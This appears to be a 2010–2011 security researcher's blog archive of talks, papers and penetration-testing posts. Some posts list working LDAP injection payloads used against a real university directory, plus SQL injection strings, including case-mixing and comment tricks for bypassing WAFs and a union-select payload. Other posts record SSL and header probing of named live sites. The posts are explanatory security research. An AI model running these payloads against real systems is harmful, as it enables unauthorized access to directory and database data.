Security Space for the Untamed Minds

Virus Bulletin - Talk

2011-12-24T08:14:00.001-08:00

Check out my virus bulletin talk - http://www.virusbtn.com/conference/vb2011/590oYHwdzKZp/abstracts/Sood.xml

OWASP Talk - The Good Hacker - Hunting Web Malware

2011-12-24T08:09:00.000-08:00

The Good Hacker:Dismantling Web Malware with Aditya K Sood & Richard J Enbody, SecNiche Security Labs, Michigan State University from OWASP on Vimeo.

BruCon 2011 - Botnets and Browsers

2011-09-28T18:07:00.000-07:00

I presented at BruCon 2011 on Botnets and Browsers.

BruCon (Brussels 2011) Hacking Conference - Botnets and Browsers (Brothers in the Ghost Shell)

View more presentations from Aditya K Sood

A nice writeup is here - http://blog.c22.cc/2011/09/20/brucon-botnets-and-browsers-brothers-in-a-ghost-shell/

Enjoy !

Source Seattle 2011 - Video Up - Art of InfoJacking

2011-09-04T06:00:00.000-07:00

In May , I presented about Art of InfoJacking in Source Seattle. The video can be seen here.

PenTest Magazine - Breaking Down i*{Devices} - Testing iPhone Security

2011-08-31T16:49:00.000-07:00

Smartphones have revolutionized the world. The online world is grappling with severe security and privacy issues. The smartphone applications require an aggressive approach of security testing and integrity verification in order to serve the three metrics of security such as confidentiality, integrity and availability.

This paper sheds a light on the behavioral testing and security issues present in Apple’s IOS devices and applications. Primarily, this paper revolves around penetration testing of iPhone device and its applications. The paper does not discuss the iPhone application source code analysis and reverse engineering.

Download the magazine from : HERE

PenTest Magazine Teaser - Mobile Hacking

View more documents from Aditya K Sood

Dissecting Java Server Faces for Penetration Testing

2011-08-25T12:34:00.000-07:00

This paper sheds light on the findings of security testing of Java Server Faces. JSF has been widely used as an open source web framework for developing efficient applications using J2EE. JSF is compared with ASP.NET framework to unearth potential security flaws.

This paper is an outcome of my work at Cigital Labs. It is a collaborative work with Security Compass team.

Download : http://www.cigital.com/papers/download/dissecting_jsf_pt_aks_kr.pdf

Dissecting Java Server Faces for Penetration Testing

View more documents from Aditya K Sood

Enjoy!

Elsevier CFS - The State of Declarative Security in Banking Websites

2011-08-23T15:40:00.001-07:00

The State of Declarative Security in HTTP Response Headers - Bank Study

View more documents from Aditya K Sood

User Agent / SSL Version and SSL2_READ_INTERNAL:bad mac decode

2011-08-19T08:21:00.000-07:00

During SSL version verification and testing, one might encounter different issues on different platforms. The output greatly depends on the type of User agent is used and the SSL configuration parameters on server side. In certain scenarios, one might encounter SSL2_READ_INTERNAL:bad mac error while testing for SSLv2 on the server. For example: let's have a look the example below

[Request/Response - 1]

root@bt:~# curl -v -2 https://www.examplebank.com:443 -k
* About to connect() to www.examplebank.com port 443 (#0)
* Trying ... connected
* Connected to examplebank.com port 443 (#0)
* successfully set certificate verify locations:
* CAfile: none
CApath: /etc/ssl/certs
* SSLv2, Client hello (1):
* SSLv2, Server hello (4):
* SSLv2, Client key (2):
* SSLv2, Client finished (3):
* error:140EC071:SSL routines:SSL2_READ_INTERNAL:bad mac decode
* Closing connection #0

root@bt:~# openssl s_client -connect www.examplebank.com:443 -ssl2
CONNECTED(00000003)
depth=0 /1.3.6.1.4.1.311.60.2.1.3=US/1.3.6.1.4.1.311.60.2.1.2=Delaware/2.5.4.15=Private Organization/serialNumber=2927442/C=US/postalCode=75202/ST=Texas/L=Dallas/streetAddress=1201 Main Street/O=Bank Corporation/OU=WebSphere Ecomm
verify error:num=20:unable to get local issuer certificate
verify return:1
depth=0 /1.3.6.1.4.1.311.60.2.1.3=US/1.3.6.1.4.1.311.60.2.1.2=Delaware/2.5.4.15=Private Organization/serialNumber=2927442/C=US/postalCode=75202/ST=Texas/L=Dallas/streetAddress=1201 Main Street/O= Bank/OU=WebSphere Ecomm
verify error:num=27:certificate not trusted
verify return:1
depth=0 /1.3.6.1.4.1.311.60.2.1.3=US/1.3.6.1.4.1.311.60.2.1.2=Delaware/2.5.4.15=Private Organization/serialNumber=2927442/C=US/postalCode=75202/ST=Texas/L=Dallas/streetAddress=1201 Main Street/O=Bank /OU=WebSphere Ecomm
verify error:num=21:unable to verify the first certificate
verify return:1
2170:error:140EC071:SSL routines:SSL2_READ_INTERNAL:bad mac decode:s2_pkt.c:274:

[Request/Response - 2]
root@bt:~# curl -v -2 https://examplebank.com:443 -k
* About to connect() to examplebank.com port 443 (#0)
* Trying ... connected
* Connected to examplebank.com (171.159.228.150) port 443 (#0)
* successfully set certificate verify locations:
* CAfile: none
CApath: /etc/ssl/certs
* SSLv2, Client hello (1):
* Unknown SSL protocol error in connection to examplebank.com.com:443
* Closing connection #0
curl: (35) Unknown SSL protocol error in connection to examplebank.com:443

root@bt:~# openssl s_client -connect examplebank.com:443 -ssl2
CONNECTED(00000003)
2179:error:1407F0E5:SSL routines:SSL2_WRITE:ssl handshake failure:s2_pkt.c:428:

The above presented response information is from the same target. The first request has "www" prefix appended to the domain name and second request is without "www" prefix.

The first case results in half handshake and server side verification fails. This error usually occurs when server detects a specific padding option chosen for the the protocol version (SSLv2 in this case). It typically looks like a Protocol Rollback Attack. The server only negotiates successfully when only SSLv2 is enabled on the server. However, hostname (www.examplebank.com) also plays a role because there is always a SSL redirection implemented on the server side.

The second case simply rejects the SSLv2 handshake. The hostname (examplebank.com) is used does not have "www" prefix. The point is while testing SSL version different errors should be fuzzed appropriately before raising a red flag.

Enjoy!

LDAP Injection - CN /SN /UID /MAIL - Attack Payloads

2011-08-16T10:17:00.001-07:00

LDAP injections are detected very less as compared to XSS attacks. However, every injection is critical from security point of view. Recently I came across one of the biggest educational university that has implemented LDAP for its directory services. With no reasonable doubt it was vulnerable to LDAP injections. It was fun to play around with it. For security purposes, I am not going to show the successful injection snapshots (figure it out yourself) but only present the payloads and brief queries.

It is the most common example of searching username in the directories. The website has search form with different name fields. On some HTTP debugging, the form is submitting these variables.

sn cn uid mail full 0 submit Search

Considering the set of variables, the most generic implementation of LDAP filter looks as presented below
(&(objectClass=Person)(|(sn=John)(cn=Woo*)))

One might encounter following errors

1. There was an error connecting to the server.Please try again.

2. You have not entered anything to search on. There were 0 matches to your query.
Please return to the search page to reformulate your query.

3. 500 Internal Server Error

4. Successful query

Attack payloads:

/cgi-bin/ldap/ldap_query.cgi?cn=)))
/cgi-bin/ldap/ldap_query.cgi?cn=john*)((|mail=*)
/cgi-bin/ldap/ldap_query.cgi?cn=admin*)((|mail=*)
/cgi-bin/ldap/ldap_query.cgi?cn=admin*)((|password=*)
/cgi-bin/ldap/ldap_query.cgi?cn=admin*)((|uid=*)
/cgi-bin/ldap/ldap_query.cgi?cn=admin*)(|uid=*)
/cgi-bin/ldap/ldap_query.cgi?cn=admin*)((|uid=*)
/cgi-bin/ldap/ldap_query.cgi?cn=admin*)((|userpassword=*)
/cgi-bin/ldap/ldap_query.cgi?cn=admin*
/cgi-bin/ldap/ldap_query.cgi?cn=*
/cgi-bin/ldap/ldap_query.cgi?cn=(&(objectClass=Person)(|(sn=John)(cn=Woo*)))
/cgi-bin/ldap/ldap_query.cgi?cn=*) (|(objectClass=person)
/cgi-bin/ldap/ldap_query.cgi?cn=*)(cn=*))(|(cn=*
/cgi-bin/ldap/ldap_query.cgi?cn=*)(|(cn = * ))
/cgi-bin/ldap/ldap_query.cgi?cn=*)(|(uid = * ))

Meta Characters - ))|\\\\ |!@#$ &&

There are other set of payloads that can be used. The output of one of the injection looks like as presented below

Enjoy !

SQL Injection (Primer 2) - Collation / Case Insensitive and WAF bypassing

2011-08-08T08:35:00.000-07:00

SQL injections are prevalent in all type of scenarios. With the advent of Web application Firewalls (WAF's) there are number of protection mechanisms that have been developed to prevent injections. WAF's are good solutions but these are not that good enough to prevent advanced level of SQL injections. However, during the course of my experience, I have noticed case sensitive / insensitive plays a critical role in designing bypasses.

The SQL queries are case insensitive. This feature of SQL databases (MySQL/ MSSQL)
helps a lot in designing WAF bypasses. The reason is, WAF's are mainly signature specific in most of cases which are explicitly written. By default, regular expressions are case sensitive. It is also possible to control case sensitivity within a pattern using the inline modifier (?i). However, it makes the signature really complex and hard to manage in certain scenarios. But this applied procedure is not hard to implement.

Note: The examples are taken from the real time websites and applications. The websites names have been masked for security purposes.

For example, the following SQL injection is usually filtered by the WAF in number of cases.
http://www.example.com/news_political.php?recordID=100+and+1=2+union+all+select+1,2,concat(Count(*)),4,5,6+from+information_schema.table_constraints--

The point is to break the filter at any one point so that whole of regular expression fails. The following code allows

http://www.example.com/news_political.php?recordID=100+aNd+1=2+uNioN+aLl+sElecT+1,2,CoNcaT(Count(*)),4,5,6+fRoM+information_schema.table_constraints--

In the above presented SQL injection, case sensitive approach is used to bypass WAF and at last case insensitive approach is exploited in order to render injection successfully. This injection can further by obfuscated using meta characters (/* ! */) , // , # +- , ; , # as pointed below

http://www.example.com/news_political.php?recordID=100/*!+aNd*/+1=2+uNioN+aLl+sElecT+1,2,CoNcaT(Count(*)),4,5,6+fRoM+information_schema.table_constraints--

One can design plethora of combinations based on the above discussed specifications in order to test for SQL injections in different environments.

All the informational issues discussed above are usually due to case insensitive nature of databases. There is a way, one can write SQL queries that are case sensitive using Collation procedure in databases. You can check for collations here. However, this process depends on the application design. It is something that developers implement by choice or when it is critically required.

Follow this !

SQL Injection (Primer 1) - PHP Escaping and Like Operators

2011-08-06T18:30:00.000-07:00

This post talks about exploiting the SQL queries with LIKE operator in use. However, this situation and target can be specific in nature but one can use the concept that is discussed below to go after exploiting the SQL injection. In order to discuss this part, let's take an example as presented below

[?php
if (isset($_POST['submit_search'])){
$search_name = htmlentities(mysql_real_escape_string($_POST['search_user']));
$age = stripslashes($_POST['age']);

$query1 = mysql_query("SELECT * FROM user_table WHERE username LIKE '$search_user' AND age=('$age')") or die("SQL Error Mate");
}?]

In this example, "search_user" is the parameter that is provided as an initial input point to the application user. As one can see, this parameter is escaped using mysql_real_escape_string(escapes special characters in a string for use in an SQL statement) and then with htmlentities (convert all applicable characters to HTML entities). There is another parameter as "age" which is set with stripslashes(returns a string with backslashes stripped off)

So in this case, where the SQL injection can be done. Following consideration leads to successful SQL injection

1. There is an age parameter which takes the value from the application user. This parameter is expected by the server in the POST request.

2. As the age parameter is using stripslashes function, it is good to inject legitimate value and then closing it appropriately.

3. In this case, one must not concentrate on exploiting the search_user parameter rather hit on the age parameter. As it is POST request, it is easy to play with proxy to set up the value for the age parameter.

4. In general, when anyone run the successful query with the legitimate username such as root, another information such as age will be thrown on the HTML page. This clearly indicates the fact that query is consuming some another parameter too.

5. So the payloads such as age=';-- produces an error as follows

"You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ';--')' at line 1"

This means the application is vulnerable to POST based SQL injection and appropriate query is required to exploit it successfully.

6. One can try for fuzzing it with different requests such as Union SQL Poisoning tricks. For example: age=27') union select 1,2,3,4,5,6,7,password from user_table -- -

For any POST based SQL injection, always try to verify the fact which field is required to be attacked and whether a new parameter can be injected or not.

You may encounter this type of scenario in hacking challenges. :)

This solution is an outcome of collaborative work with Rohit (Rb1337). Hope to share some more thoughts on SQL injections.

Anatomy of OpenSSL and Penetration Testing - Breaking Benjamin

2011-08-05T11:03:00.000-07:00

SSL is one of the most attractive and shocking protocol in myriad of ways. There is always something different about this protocol. Considering the real time security testing, you might encounter tricky scenarios while handling sessions with the SSL. OpenSSL is widely used to deploy the SSL as a open source platform. Apache configured with mod_ssl is used heavily for this purposes. During open research and technical verification, we (me and my friends) came across a domain (www.ebay.in) having bad SSL implementation. So I thought to write a detailed post on this issue. The aim of this post is to understand the unexpected variance in the responses of the remote server when SSL connection is initiated using different OpenSSL versions

Target check : www.ebay.in [ For educational purposes only].

A simple host discovery gives the following information which suggests that DNS load balancer is in place. Since it is a heavy eCommerce website, one must expect this.

root@bt:~# host ebay.in
ebay.in has address 66.135.200.23
ebay.in has address 66.135.215.61
ebay.in mail is handled by 10 data.ebay.com.
ebay.in mail is handled by 10 gort.ebay.com.
ebay.in mail is handled by 10 lore.ebay.com.

root@bt:~# host www.ebay.in
www.ebay.in is an alias for ebay.in.edgesuite.net.
ebay.in.edgesuite.net is an alias for a142.g.akamai.net.
a142.g.akamai.net has address 204.245.162.34
a142.g.akamai.net has address 204.245.162.59

This website is accessible over HTTP and HTTPS, this gives a straight forward information regarding the open ports 80/443. One can expect redirection parameters defined on server side to automatically redirect the incoming HTTP requests to HTTPS.
Further, when a simple GET request is issued to the server, it responds back with the following HTTP responses

(Status-Line) HTTP/1.0 200 OK
Server Apache-Coyote/1.1
Content-Encoding gzip
Content-Type text/html;charset=UTF-8
Content-Length 9986
Vary Accept-Encoding
Expires Fri, 05 Aug 2011 18:08:39 GMT
Cache-Control max-age=0, no-cache, no-store
Pragma no-cache
Date Fri, 05 Aug 2011 18:08:39 GMT
Connection keep-alive
Set-Cookie ebay=%5Esbf%3D%23%5E; Domain=.ebay.in; Path=/
Set-Cookie dp1=bu1p/QEBfX0BAX19AQA**501d6527^spref/20351fe98a7^; Domain=.ebay.in; Expires=Sun, 04-Aug-2013 18:08:39 GMT; Path=/
Set-Cookie cssg=9b21f5741310a02652e39d83ffdf018c; Domain=.ebay.in; Path=/
Set-Cookie s=CgAD4ACBOPYMnOWIyMWY1NzQxMzEwYTAyNjUyZTM5ZDgzZmZkZjAxOGPrM83K;Domain=.ebay.in;Path=/; HttpOnly
Set-Cookie nonsession=CgADKACBXojMnOWIyMWY1NzQxMzEwYTAyNjUyZTM5ZDgzZmZkZjAxOGYAywABTjw4rzGpIP/j; Domain=.ebay.in; Expires=Sat, 04-Aug-2012 18:08:39 GMT; Path=/

The Server header points to the Apache-Coyote/1.1 which may be running this flavor of Apache. Usually, it is true in number of cases.

The first three tests are conducted using OpenSSL, cURL and SSLScan in general. This host is a backtrack machine with an OpenSSL 0.9.8k 25. In this , the aim is to verify the presence of SSLv2

root@bt:~# openssl version / OpenSSL 0.9.8k 25 Mar 2009

root@bt:~# curl --version
curl 7.19.7 (i486-pc-linux-gnu) libcurl/7.19.7 OpenSSL/0.9.8k zlib/1.2.3.3 libidn/1.15
Protocols: tftp ftp telnet dict ldap ldaps http file https ftps
Features: GSS-Negotiate IDN IPv6 Largefile NTLM SSL libz

Test 1: Using OpenSSL, following response is detected which shows the acceptance of SSLv2.
root@bt:~# openssl s_client -connect www.ebay.in:443 -ssl2
CONNECTED(00000003)
subject=/C=US/O=Akamai Technologies, Inc./CN=a248.e.akamai.net
issuer=/C=US/O=GTE Corporation/OU=GTE CyberTrust Solutions, Inc./CN=GTE CyberTrust Global Root
---
No client certificate CA names sent
---
Ciphers common between both SSL endpoints:
RC4-MD5 EXP-RC4-MD5 RC2-CBC-MD5
EXP-RC2-CBC-MD5 DES-CBC-MD5 DES-CBC3-MD5
---
SSL handshake has read 995 bytes and written 236 bytes
---
New, SSLv2, Cipher is DES-CBC3-MD5
Server public key is 1024 bit
Secure Renegotiation IS NOT supported
Compression: NONE
Expansion: NONE
SSL-Session:
Protocol : SSLv2
Cipher : DES-CBC3-MD5
Session-ID: E03D2C3CCD43347B13383DA55F2FD326
Session-ID-ctx:
Master-Key: 16011C613D2E862A91FD0A069AF1FFAE5058F0BFEADB87F0
Key-Arg : A9D372330CD89517
Start Time: 1312569173
Timeout : 300 (sec)
Verify return code: 21 (unable to verify the first certificate)

Test 2: Using cURL to verify the state.
root@bt:~# curl -v -2 https://www.ebay.in -k
* About to connect() to www.ebay.in port 443 (#0)
* Trying 204.245.162.34... connected
* Connected to www.ebay.in (204.245.162.34) port 443 (#0)
* successfully set certificate verify locations:
* CAfile: none
CApath: /etc/ssl/certs
* SSLv2, Client hello (1):
* SSLv2, Server hello (4):
* SSLv2, Client key (2):
* SSLv2, Client finished (3):
* SSLv2, Server verify (5):
* SSLv2, Server finished (6):
* SSL connection using DES-CBC3-MD5
* Server certificate:
* subject: C=US; O=Akamai Technologies, Inc.; CN=a248.e.akamai.net
* start date: 2010-10-06 16:41:56 GMT
* expire date: 2011-10-06 16:40:47 GMT

Test 3: Using SSLScan to verify the state.
root@bt:~# sslscan www.ebay.in
Version 1.8.2
Testing SSL server www.ebay.in on port 443

Supported Server Cipher(s):
Accepted SSLv2 168 bits DES-CBC3-MD5
Accepted SSLv2 56 bits DES-CBC-MD5
Accepted SSLv2 40 bits EXP-RC2-CBC-MD5
Accepted SSLv2 128 bits RC2-CBC-MD5
Accepted SSLv2 40 bits EXP-RC4-MD5
Accepted SSLv2 128 bits RC4-MD5

It has been verified that this particular domain is accepting SSLv2 and all the testing output has confirmed this. Note , in this OpenSSL version 0.9.8k is used.

Now moving on to second set of tests with same tools having updated version of OpenSSL as follows

user@ubuntu:~$ openssl version / OpenSSL 0.9.8o 01 Jun 2010

curl 7.21.3 (i686-pc-linux-gnu) libcurl/7.21.3 OpenSSL/0.9.8o zlib/1.2.3.4 libidn/1.18
Protocols: dict file ftp ftps gopher http https imap imaps ldap ldaps pop3 pop3s rtsp smtp smtps telnet tftp
Features: GSS-Negotiate IDN IPv6 Largefile NTLM SSL libz

The versions are different. In order to conduct security testing of SSL, the same tests are conducted again.

Test 4: Verifying the SSLv2 (updated OpenSSL)
user@ubuntu:~$ openssl s_client -connect www.ebay.in:443 -ssl2
2543:error:140A90C4:SSL routines:SSL_CTX_new:null ssl method passed:ssl_lib.c:1453:

The connection over SSLv2 fails. Let's move on to next case

Test 5: Verifying the SSLv2 (updated cURL)
user@ubuntu:~$ curl -s -v -k https://www.ebay.in -2
* About to connect() to www.ebay.in port 443 (#0)
* Trying 204.245.162.34... connected
* Connected to www.ebay.in (204.245.162.34) port 443 (#0)
* SSL: couldn't create a context!
* Closing connection #0

cURL also fails for the SSLv2. Jumping on to next and final test

Test 6: Verifying the SSLv2 (SSLScan)
user@ubuntu:~$ sslscan www.ebay.in
Version 1.8.2

ERROR: Could not create CTX object.

Testing SSL server www.ebay.in on port 443

Supported Server Cipher(s):
Rejected SSLv3 256 bits ADH-AES256-SHA
Rejected SSLv3 256 bits DHE-RSA-AES256-SHA
Rejected SSLv3 256 bits DHE-DSS-AES256-SHA
Accepted SSLv3 256 bits AES256-SHA
Rejected SSLv3 128 bits ADH-AES128-SHA
Rejected SSLv3 128 bits DHE-RSA-AES128-SHA
Rejected SSLv3 128 bits DHE-DSS-AES128-SHA

In this test, no SSLv2 output (rejected/accepted) is there. However, one can see that "ERROR: Could not create CTX object" notification which primarily is an outcome of the fact that SSLScan fails to instantiate context for SSLv2.

As it is known in the wild that all the newer version of browser hardly initiate connection using SSLv2. It looks like OpenSSL 0.9.8o 01 is doing the same way. Hardening the client straight away so that only updated version of protocol are used to do that.

Note: for penetration testing, my personal advise is to use OpenSSL 0.9.8k 01 or any version less than <= k for strong testing. It is also a good choice to use <=k versions and also > k versions to differentiate the output.

Giving a final check on the certificates (www.ebay.in), it has been noticed that certificate is already expired

and the amazing result is also presented below

So overall, this situation is really bad for an eCommerce website. For verification tests of SSL one should not rely on single tool. It is preferable to use OpenSSL, cURL and SSLScan as an overall tool set and the protocol should be fuzzed appropriately. Be sure of the OpenSSL version you are using.

NOTE: Additionally, declarative security can also be used to prevent MITM attacks. I will be releasing Mozilla Firefox addon soon (under review). This addon is capable of detecting Strict-Transport-Security parameter in HTTP response header and notify the penetration tester about the usage of declarative security (whether the server wants to harness the browser protection)

Stay tuned. Enjoy !

Framebusting - The Dual Protection Core

2011-08-01T11:50:00.000-07:00

Since the outcome of ClickJacking attacks, framebusting has become the unavoidable part of web application security. Considering the real world scenario, it has been noticed that still the appropriate protections have not been placed in the plethora of websites. Seclab guys conducted the study on framebusting. They raise a point on the right way of implementing the framebusting code. However, a similar protection features have been implemented in the famous websites such as Twitter, Facebook etc. However, my personal opinion is to use the dual protection which includes the implementation of declarative security as well as framebusting code. No doubt, only new versions of certain browsers such as Internet Explorer, Firefox etc support some of the declarative security features. Deploying declarative security feature is a good additional point. I have written Firefox addons that detect the presence of declarative security headers that are coming from servers. In this post, I am using X-Frame-Options detector hosted here

Lets see how the twitter implements the framebusting code

========================= TWITTER ======================================
function bust () {
document.write = "";
window.top.location = window.self.location;
setTimeout(function() {
document.body.innerHTML = '';
}, 0);
window.self.onload = function(evt) {
document.body.innerHTML = '';
};
}
if (window.top !== window.self) { // are you trying to put self in an iframe?
try {
if (window.top.location.host) { // this is illegal to access unless you share a non-spoofable document domain
// fun times
} else {
bust(); // chrome executes this
}
} catch (ex) {
bust(); // everyone executes this
}
}
========================= TWITTER =====================================

This works very well. The beauty of this protection is even if the webpage is framed using advanced techniques, the twitter displays the white page thereby dethroning the success rate of successfully framed web page. Give a shot yourself. Apart from this, twitter also throws X-Frame-Options header which adds another protection layer to use the inbuilt browser protection mechanism

Let's have a look at the Facebook

========================= FACEBOOK ==============================

function si_cj(m)
{
setTimeout(function()
{
new Image().src="http:\/\/error.facebook.com\/common\/scribe_endpoint.php?c=si_clickjacking&t=8340"+"&m="+m;
},5000);
}
if(top!=self)
{try{if(parent!=top)
{throw 1;}var si_cj_d=["apps.facebook.com","\/pages\/","apps.beta.facebook.com"];

var href=top.location.href.toLowerCase();

for(var i=0;i<si_cj_d.length;i++)

{if (href.indexOf(si_cj_d[i])>=0){throw 1;}}si_cj("3 ");}

catch(e){si_cj("1 \t");window.document.write("\u003cstyle>body * {display:none !important;}\u003c\/style>\u003ca href=\"#\" onclick=\"top.location.href=window.location.href\" style=\"display:block !
important;padding:10px\">\u003ci class=\"img sp_8lnh2w sx_fcd3c0\" style=\"display:block !important\">\u003c\/i>Go to Facebook.com\u003c\/a>");
}}

============================ FACEBOOK ==============================

This code works appropriately and displays the small Facebook image with a link to main Facebook page in the Iframe as presented below

Facebook does not use declarative security protection feature

Google implements the code as follows

if (top.location != self.location) {top.location = self.location.href;}

It also implements the X-Frames-Options header to add another layer.

The cases discussed above are from the most explored websites. However, the normal scenarios are very bad. My suggestion is to implement both solutions collaboratively rather than sticking to one. The browser security guys are implementing inbuilt solutions and we should harness the power. The dual protection is always good.

InfoJacking - A Walk through Social Networking Websites

2011-07-28T19:41:00.000-07:00

Last month, I presented at Source Seattle conference. The slides are available for download from Cigital's website here. I also wrote some views about different cases of collecting information here. The detection of hidden devices such as WAF's , protection against advanced attacks are very much important. I discussed different cases in my presentation about collecting information from HTTP response headers. I thought to just move on and verify the state of some social networking websites.

The Facebook response header dump looks like as follows

(Status-Line) HTTP/1.1 200 OK
Cache-Control private, no-cache, no-store, must-revalidate
Expires Sat, 01 Jan 2000 00:00:00 GMT
P3P CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma no-cache
Set-Cookie reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F; path=/; domain=.facebook.com
Set-Cookie wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Encoding gzip
Content-Type text/html; charset=utf-8
X-FB-Server 10.54.249.30
X-Cnection close
Transfer-Encoding chunked
Date Fri, 29 Jul 2011 02:39:59 GMT

The highlighted part in the dump suggests that Facebook is running under the shadow of NetScaler [WAF + Load Balancer] device. On continuous observing and validating certain functions, I extracted some combinations of URL's and related HTTP header sent with it i.e. X-FB-Server

https://www.facebook.com/login.php?login_attempt=1
X-FB-Server 10.36.129.112

http://www.facebook.com/home.php?sfrm=1
X-FB-Server 10.36.252.123

http://static.ak.fbcdn.net/rsrc.php/v1/yn/r/l2REPOIm5eD.css
X-FB-Server 10.138.17.184

http://static.ak.fbcdn.net/rsrc.php/v1/yp/r/uRff5za-w5e.css
X-FB-Server 10.138.64.186

http://static.ak.fbcdn.net/rsrc.php/v1/yT/r/cWd6w4ZgtPx.png
X-FB-Server 10.30.147.194

http://www.facebook.com/ajax/chat/buddy_list.php?__a=1
X-FB-Server 10.42.74.73

http://www.facebook.com/ajax/chat/buddy_list.php?__a=1
X-FB-Server 10.43.50.79

http://www.facebook.com/ajax/hovercard/user.php?id=1036258667&__a=1
X-FB-Server 10.42.174.47

http://www.facebook.com/ajax/ufi/modify.php?__a=1
X-FB-Server 10.42.108.21

http://www.facebook.com/?ref=logo&__a=20&ajaxpipe=1&quickling[version]=412753%3B0
X-FB-Server 10.42.118.79

The X-FB-Server header value was changing with different responses. However, one thing remains same is the combination of X-FB-Server with X-Cnection. This simply projects that WAF + Load Balancer is playing a role.

However, Facebook does not reveal the web server information in Server header. Additionally, Facebook responses contain the "X-Backend :" header with different values. For informational purposes, the X-Backend header is sent by 3 different servers : nginx , Apache-Coyote and lighttpd primarily.

The point is HTTP response headers reveals a lot of information which can be potentially useful for testing purposes.

Malvertising Paper - Elsevier CFS Journal

2011-04-30T17:13:00.001-07:00

Malvertising - Exploiting Web Advertising | Elsevier Computer Fraud and Security Journal

View more documents from Aditya K Sood

Google Chrome - Security Issues Reported So Far

2011-03-22T19:12:00.000-07:00

I have enumerated the list of Google Chrome bugs given to Chrome security team.

Issue 2632:Google Chrome Carriage Return Null Object Memory Exhaustion Remote Dos

Issue 2877:Google Chrome Window Object Suppressing Denial of Service

Issue 4739: Google Chrome MetaCharacter URI Obfuscation Vulnerability

Issue 5978: Google Chrome FTP PASV IP Malicious Port Scanning Vulnerability

Issue 7099: Google Chrome 1.0.154.43 ClickJacking Vulnerability

Issue 11158: Google Chrome document.write/throw exception DOM causes NULL ptr DoS

Issue 30972: Google Chrome XSS through MS Word Script Execution Object

Issue 53096: Google Chrome: HTTP AUTH Dialog Spoofing through Realm

Issue 75937: Google Chrome 10.0.648.133 XSS Filter Bypass

Oracle.com Redirection Vulnerability Video

2010-11-15T02:47:00.000-08:00

ISSA Journal - JavaScript Infection Model

2010-11-10T18:55:00.001-08:00

Check out my paper on JavaScript Infection Model published in November issue of ISSA journal.

https://www.issa.org/Members/Journal/

HackInThe Box EZine - DataCenter Hacking Paper / My Interview

2010-11-10T18:50:00.000-08:00

Check out my interview and our paper on data-center hacking through helpdesk support systems.

http://magazine.hitb.org/issues/HITB-Ezine-Issue-004.pdf

ECCouncil Botnet Briefing Slides

2010-11-10T18:48:00.000-08:00

EC Council - Botnet Briefings

View more presentations from Aditya K Sood.

HackerHalted Miami 2010 - Slides

2010-11-10T18:46:00.000-08:00

Hacker Halted Miami , USA 2010

View more presentations from Aditya K Sood.

OWASP AppSec USA - Slides and Presentation

2010-11-10T18:43:00.000-08:00

OWASP App Sec US - 2010

View more presentations from Aditya K Sood.

Aditya K. Sood, Bug-Alcoholic 2.0 - Untamed World of Web Vulnerabilities from AppSec USA 2010 on Vimeo.

Malware At Stake Blog

2010-08-28T12:47:00.001-07:00

We have started our new blog at http://secniche.blogspot.com. This blog is specifically entitled to malware research. so keep a track on it for malware details straight from the underground.

User Interface Security - Google Chrome HTTP AUTH Dialog Spoofing through Realm Manipulation

2010-08-23T14:40:00.000-07:00

Google Chrome ( 5.0.375.127 and previous versions) suffers from HTTP Auth Dialog spoofing vulnerability due to possible realm manipulation in the HTTP header. Previously, Google chrome has got a similar bug which can be seen HERE

This bug was actually patched. The issue mentioned in this bug was dialog spoofing due to long sub domain names. The patch worked only for that specific case which was outlined in that bug. There are number of tests have been conducted on Google Chrome
which verifies the inefficiency of Google Chrome to scrutinize the type of realm value set in the header. It can be tampered with double quotes and single quotes used in a definite manner.

Another related scenario: HERE

Note: Different variants have shown that these issues are still open and not patched yet.

As mentioned in RFC 2617: "The realm directive (case-insensitive) is required for all authentication schemes that issue a challenge.The realm value (case-sensitive), in combination with the canonical root URL (the absolute URI for the server whose abs_path is empty;of the server being accessed, defines the protection space. These realms allow the protected resources on a server to be partitioned into a set of protection spaces, each with its own authentication scheme and/or authorization database.//The realm value is a string,generally assigned by the origin server, which may have additional semantics specific to the authentication scheme. Note that there may be multiple challenges with the same auth-scheme but different realm/s"

So, realm value plays critical role in determining the framework of HTTP Access authentication for a particular resource. It has been analyzed that it is possible to spoof the HTTP Auth dialog by playing around realm values. This attack scenario
can be used to launch phishing attacks and stealing sensitive information from the legitimate websites.

As it has been released before, Google Chrome fails to sanitize the obfuscated URL and redirect it to the different domain. This potential flaw can be combined with the HTTP Auth dialog spoofing to launch attacks against legitimate websites. Looking at this particular point of time, certain solutions can be presented as

1. A new model of HTTP authentication dialog which shows the clarity between realm value and domain.

2. Setting a limit on size of strings to be passed as Realm value. This should not be applied on the string size of domain name.

3. Application of appropriate parameters in scrutinizing the strings passed in double quotes and single quotes.

Further: Tim from Vsecurity notifies about similar work related to HTTP Authentication. A very good paper has been presented HERE which covers lot of issues of HTTP authentication

The video is embedded below

Debugged MZ/PE - Holistic Approach to Analysis of Defective Threads

2010-08-09T18:25:00.000-07:00

Abstract: Threads are considered as second level structures used in the process execution. As per semantics, threads run as dynamic entities under processes. Whenever a new process is created in a system a number of threads are initialized. To understand the real cause of infection in processes, one has to traverse along the working procedure of a thread.

Online : http://debuggingexpert.dumpanalysis.org/Debugged_March_2010.htm

The hard cover will be release at Amazon : HERE

TRISC 2010 - Scaling Web 2.0 Malware

2010-08-07T20:41:00.000-07:00

TRISC conference presentation is rooted below

Scaling Web 2.0 Malware Infection

HITB Magazine: MS Office Infection Paper

2010-07-11T10:12:00.000-07:00

A new paper has been released in the HITB magazine about infection styles in MS Office files. It projects a pattern of infection used by chinese malware.

Fetch:http://magazine.hackinthebox.org/issues/HITB-Ezine-Issue-003.pdf

Credentials Verification- Security Emails Phishing and Trust Manipulation

2010-05-05T11:20:00.000-07:00

Phishing attacks based on trust exploitation are on rise. Banks are facing tremendous complexities and security issues due to these type of attacks. The primary focus of this sort of attack is to trick user’s sense of understanding and
segregating the trust to perform operations of attackers choice. The case studies discussed in this article sheds light on phishing attacks that exploits user trust behavior with the third party. Credit card forgeries are quite common considering the bank phishing frauds. The primary artifact of attackers is to play with the user trust and to manipulate user thinking process by raising a complexity through spams. The user inability to distinguish between the trusted website and attacker controlled website, which is a replica of the original website, results in forged transactions.

